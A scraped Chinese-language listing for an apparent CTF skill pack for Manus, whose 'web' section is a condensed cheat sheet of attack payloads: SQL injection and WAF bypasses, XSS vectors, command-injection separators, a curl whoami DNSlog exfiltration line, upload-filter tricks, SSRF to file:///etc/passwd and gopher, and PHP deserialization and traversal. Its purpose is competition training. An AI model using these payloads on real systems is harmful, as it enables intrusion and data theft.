在 Manus 中运行任何 Skill
一键导入
一键导入
一键在 Manus 中运行任何 Skill
开始使用$pwd:
$ git log --oneline --stat
stars:236
forks:29
updated:2026年4月29日 19:55
SKILL.md
密码学攻击技术,包括古典密码、RSA、AES、哈希碰撞、椭圆曲线等密码系统的分析与破解。
磁盘取证分析技术,涵盖 NTFS/FAT/ext 文件系统解析、文件恢复、时间线分析、日志挖掘等实战技能。
杂项技术,包括隐写术、流量分析、编码转换、取证分析、AI 安全等非传统 CTF 分类。
二进制漏洞利用技术,包括栈溢出、堆利用、格式化字符串、ROP 链构造、内核漏洞利用等。
逆向工程技术,包括 ELF/PE 二进制分析、脱壳、反混淆、Android 逆向、固件分析等。
| name | web |
| description | Web 安全攻防技术,包括 SQL 注入、XSS、文件上传、命令注入、SSRF、反序列化等常见漏洞的识别与利用。 |
| tags | ["sql-injection","xss","file-upload","command-injection","ssrf","deserialization","php"] |
ORDER BY 确定列数 -> UNION SELECT 提取数据AND 1=1/AND 1=2,时间盲注 SLEEP()/BENCHMARK()--batch --dbs --current-user/**/、双重编码、HPP 参数污染/*!50000select*/、%0a 换行、<> 替代空格<>\"'/ 过滤情况document.location、innerHTML 等 DOM 操作<img onerror=alert(1)>、<svg onload=alert(1)>、编码绕过;、&&、||、|、\n、`$IFS、{cmd,arg}、%09、< 重定向a=fl;b=ag;cat $a$b、通配符 cat /fl*、base64 编码curl \whoami`.xxx.dnslog.cn`、时间盲注Content-Type 为 image/png.php5、.phtml、.pht、.php.jpg(Apache 解析漏洞)GIF89a 或 PNG 文件头.htaccess 添加自定义解析规则file:///etc/passwd、dict://、gopher://http://127.0.0.1:端口、http://192.168.x.x@ 符号 http://attacker.com@127.0.0.1、进制转换 0x7f000001、IPv6 [::1]== 比较时 "0e123" == "0e456" 为 Truephp://filter/convert.base64-encode/resource=、php://input__construct、__destruct、__wakeup、__toString 魔术方法extract()、parse_str()、$$var../ 目录穿越、%00 截断(PHP < 5.3.4)